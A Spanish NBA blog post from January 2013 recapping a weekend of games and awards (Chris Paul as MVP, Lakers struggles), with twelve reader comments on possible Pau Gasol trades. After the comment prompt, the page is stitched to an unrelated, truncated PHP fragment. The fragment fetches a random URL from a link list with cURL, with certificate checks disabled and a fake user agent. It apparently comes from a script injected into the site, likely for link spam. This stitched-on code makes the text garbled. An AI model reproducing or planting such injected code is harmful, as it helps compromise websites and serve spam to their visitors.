Informe del fin de semana: Ausentes

07 de January de 2013 por txusma

El frenesí o la desidia de tantos días de vacaciones os dejó, por primera vez en mucho tiempo, huérfanos del habitual post del fin de semana. Por lo que sea (o por los mismos motivos) tampoco es que se nos cayera el servidor debido al aluvión de visitas. Digamos que el personal ha estado a otras cosas. No va mal desconectar de vez en cuando.

De todo lo acontecido en la liga, destaca la recaída de Kevin Love en la fractura de su mano. Terrible su año en lo que respecta a lesiones y terrible también el del equipo en general. De momento ya están fuera de plaza de playoffs, aunque mantienen un digno 50% de victorias. Por otro lado volvimos a ver a Dirk ser titular con su equipo, aunque esto no sirviera para mejorar resultados, de momento.

En el aspecto positivo debemos nombrar a varios equipos:

Casi no es noticia que Clippers y Thunder ganen todo lo que juegan. Tuvieron mayor mérito de los primeros que se enfrentaron a rivales de mayor entidad teórica: el viernes al vecino rico y el sábado a los sorprendentes Warriors. A ambos los dejaron a la altura del betún debido en buena parte a las exhibiciones de Paul, que vuelve a sonar en las quinielas al MVP. Por su parte los Thunder arrasaron a Sixers y Raptors sin mayor historia.

El equipo más en forma en este momento son los Rockets, que empiezan a coquetear con el 60% de victorias gracias a las 4 seguidas en esta racha, dos este fin de semana. Bucks y Cavs fueron las víctimas de Harden y los suyos. 

También destacan las resurrecciones de los Celtics y los Nets, la de los verdes especialmente. El viernes destrozaron defensivamente a los Pacers. Garnett terminó expulsado y Sullinger recogió dignamente el testigo. El sábado Rondo se destapó con triple doble ante Hawks. Por los Nets victoria fácil ante Kings y algo más apurada frente a Wizards en dos prórrogas y canasta ganadora de Joe Johnson.

Finalmente los Nuggets también sacaron adelante sus compromisos ante Jazz, primero, y anoche la habitual contra Lakers. Los Blazers también ganaron dos veces, destacando Wesley Matthews. Una ante Grizzlies y el sábado ante Wolves.

En el aspecto negativo encontramos nuevamente a los Lakers. Lo de Gasol es un poema y ya no atinamos a identificar el problema. Sólo podemos calificarlo de desesperante. Dobles derrotas también para Hawks, Sixers, Raptors, Suns y Wizards.

Del resto de choques que no hemos mencionado destacamos:

Viernes.- Victoria de los Bulls ante los campeones, extraordinario Boozer; la irrupción de Daye, básica para la remontada de los Pistons y así tumbar a los Hawks.
Sábado.- Los Spurs le inflingieron uno de los palizones a los Sixers
Domingo.- Victoria de los Bobcats ante Pistons; Palizón de los Heat a Washington y victoria de los Grizzlies ante Suns.

PREMIOS

MVP: Chris Paul ha sido el rey indiscutible. De su mano y de sus 28’5 puntos, 5’5 asistencias y 11 asistencias, los Clippers han conseguido llevarse los 2 partidos en juego. Los Rockets también se llevaron los dos partidos con James Harden como hombre más destacado. 29 puntos anotó en abbos encuentros. Otros jugadores como Carmelo Anthony (40-6-6 el sábado) o Greivis Vazquez (27-7-9, el sábado) también cuajaron grandes actuaciones y ganaron el único partido que jugaron. Demarcus Cousins (29’5 puntos y 15’5 rebotes) o Kyrie Irving (31’5 puntos, 4’5 rebotes y 6 asistencias) fueron otros de los que estuvieron soberbios pero perdieron uno de los 2 partidos jugados.

Rookie: Buena actuación de Bradley Beal el viernes frente los Nets con 24 puntos, 6 rebotes, 4 asistencias y 3 robos. Damian Lillard consiguió 20 puntos, 4 rebotes y 6 asistencias el sábado.

Sorpresa: Carlos Delfino consiguió el viernes 22 puntos con un 8 de 11 en tiro y ayer, Alan Anderson, el ex-jugador del Barça, fue el mejor de los Raptors con 27 puntos, 3 asistencias y 4 rebotes. Tristan Thompson ha jugado a buen nivel durante todo el fin de semana y ha promediado 16’5 puntos y 14’5 rebotes.

Esfuerzo en vano: Premios para la pareja Kobe Bryant Dwight Howard. Los Lakers perdieron los 2 partidos jugados a pesar de los 33’5 puntos del primero y de los 20’5 rebotes del segundo.

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. nba dice:
    #1

    Bueno parece que Pau sigue empeñado en devaluar su cache, si los Lakers no hacen un movimiento rapido se van a encontrar fuera de todas las opciones por entrar en playoff, y como mucho le cambiaran a Pau por una bolsa de chuches…, al final tendremos que pelear con Sacramento para no acabar los ultimos.
    Sospechosa actuacion de Cousins, me huele que es para que sus pretendientes hagan el movimiento de una vez.
    Habra que preguntar a Adelman, que es lo que les da a sus chicos, para que esten dia si y dia tambien en la enfermeria

      Citar

  2. Simon dice:
    #2

    ¿ Que porcentaje tiene Avery Bradley en la mejora de Boston en los dos últimos partidos ? es un buen defensor pero la defensa de Boston ha pasado de la noche al día con su sola presencia en los dos últimos partidos…

      Citar

  3. Denise dice:
    #3

    nba: Bueno parece que Pau sigue empeñado en devaluar su cache,

    Ahora mismo diría que tiene mas valor por el pedazo de expiring de 20 kilos que deja en 2014…teniendo en cuenta la de buenos agentes libres que hay ese verano…que por aspectos deportivos; aunque yo estoy seguro que si empleas bien a Gasol poniendolo en su posición, buscandole por dentro y dandole confianza, estaría en las medias de 19-9 que ha hecho durante toda su carrera.

      Citar

  4. Esteban dice:
    #4

    comparto con denise, pau no encuentra sitio en el equipo, es un jugador que con bola al poste trabajando con la espalda y el hombre hace sus puntos cunado quiere, a difrencia de otros, no es un jugador de ricibir y lanzar, necesita amazar al balon al poste

    en los lakers no puede hacerlo y lo unico que han logrado forzandolo es a que baje enormemente su valor y que al dia de hoy nadie de demasiado por el

    jugando como lo esta haciendo a los lakers les conviene mantenerlo, pues dudo que haya algun postor que de algo interesante

    la solucion podria ser amare, los lakers se meterian en un flor de lio con el largo contrato de amare, pero si d´antoni cree que le puede ser utial, allá el, mientras que los knicks recibirian a paul con los brazos abiertos y con chances de titulo

      Citar

  5. Jose Luis dice:
    #5

    Pau con los años que tiene está para jugar al poste en ataque y poco más. Quiero decir que encajaría bien en equipos que tuviesen un 4-5 abierto que pudiera dejarle espacios, pero como 4 tirador no vale la pena ese contrato que tiene. ¿Los Celtics no querrían a Pau? Green en los Lakers encajaría bien en el sistema D’Antoni, Courtney Lee y Bass podrían ser el resto, y Clark podría ir a Boston.

    Pau + Clark x Green + Bass + Lee… ¿lo veis mal? los salarios encajan

      Citar

  6. Ruxixón dice:
    #6

    Daimiel decía el otro día que Minny era uno de los equipos más interesados en Pau,por no decir el que más.A mí me parece un error para ellos desprenderse de Pekovic pero al parecer pedirá 10-12 millones por año en un contrato multianual,mientras que Pau es año y medio por delante de contrato.

    A partir de ahora cosecha mía,en Boston Pekovic cae como agua de mayo,Jeff Green en Lakers.Rellenando por aquí y por allá creo que pueden hacer un traspaso interesante entre las 3 partes.

      Citar

  7. Santi dice:
    #7

    Tristan Thompson se está convirtiendo en un jugador interesante. Ha aumentado mucho su capacidad de reboteo defensiva, su porcentaje de tiros libres (no era muy difícil), su efectividad cerca del aro (48% pese a no crearse su propio tiro) y sus movimientos, que son menos erráticos. Y aún tiene margen de mejora, es joven y tiene muy buena actitud, por lo que se ve. Veremos que rol asume junto a Varejao cuando éste regrese

      Citar

  8. Esteban dice:
    #8

    y estamos en el problema de los 18 millones de pau, a cambio de eso le daran a los lakers escoria, o alguien bueno rodeado de escoria

    seria mas sencillo si cobraras 10 millones y se fuera mano a mano por green por ejemplo, pero un trade con green requiere que los celtics rellenen el paquete con 10 millones mas, lo que lo vuelve casi imposible

    q podrian conseguir los lakers por jamision? al thunder le vendria de perlas, quien le podrian dar a los lakers estos?

      Citar

  9. Txusma dice:
    #9

    Howard y Gasol estarán fuera de las canchas por un tiempo indeterminado debido a sus respectivas lesiones. Hablan de 1-2 semanas pero con estas cosas, ya se sabe.
    Definitivamente les ha mirado el tuerto. Es la hora de Robert Sacre!!!

      Citar

  10. Esteban dice:
    #10

    uhhhh sin ellos dos durante dos semanas los lakeres podrian encontrarse en un 16-24, con nada menos que 40 partidos jugados, lejisimo de los PO

    cuando se transformaran en el equipo aspirante al anillo? no quedan tantos juegos, quiza sea el proximo año

      Citar

  11. Denise dice:
    #11

    Esteban: uhhhh sin ellos dos durante dos semanas los lakeres podrian encontrarse en un 16-24, con nada menos que 40 partidos jugados, lejisimo de los POcuando se transformaran en el equipo aspirante al anillo? no quedan tantos juegos, quiza sea el proximo año

    Bueno…visto al nivel al que estaban jugando, a lo mejor la pareja Jamison-Hill mas la ayuda de Sacre, Clark, lo hacen mejor que la dupla Pau-Howard.
    No nos engañemos, Superman está fracasando de momento, su rendimiento no es ni la mitad de bueno que el que tenía en los Magic.

    Y hablando de Magic…otra derrota mas (8 o 9 consecutivas) y todas ellas menos 1 por menos de 6 puntos. Está ultima con prorroga incluida.

      Citar

  12. Jose Luis dice:
    #12

    Creo que Jordan Hill también está lesionado.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>